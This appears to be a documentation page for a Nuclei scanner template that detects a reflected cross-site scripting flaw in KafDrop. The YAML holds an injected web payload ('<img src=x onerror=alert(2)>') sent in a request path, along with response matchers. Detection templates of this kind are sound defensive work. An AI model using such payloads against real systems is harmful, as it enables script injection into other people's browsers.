Skip to content

KafDrop - Cross-Site Scripting

ID: kafdrop-xss

Severity: high

Author: dhiyaneshDk

Tags: kafdrop,xss

KafDrop contains a cross-site scripting vulnerability. It allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server.

id: kafdrop-xss
info:
name: KafDrop - Cross-Site Scripting
author: dhiyaneshDk
severity: high
description: KafDrop contains a cross-site scripting vulnerability. It allows remote unauthenticated attackers to inject arbitrary HTML and/or JavaScript into the response returned by the server.
reference:
- https://github.com/HomeAdvisor/Kafdrop/issues/12
- https://www.blackhatethicalhacking.com/news/apache-kafka-cloud-clusters-expose-sensitive-data-for-large-companies
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
max-request: 1
tags: kafdrop,xss
http:
- method: GET
path:
- "{{BaseURL}}/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E"
matchers-condition: and
matchers:
- type: word
words:
- 'Kafdrop'
- '<img src=x onerror=alert(2)>'
part: body
condition: and
- type: status
status:
- 500
# digest: 4b0a00483046022100a0f3e82d961a2cb27e41a622c8ee2d977214797d0c57929c91b01200353232fe022100f6685315c1e6c792777f715a1aaa515361d4df94e2f10d2900b5be975f38f56b:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/kafdrop-xss.yaml"

View on Github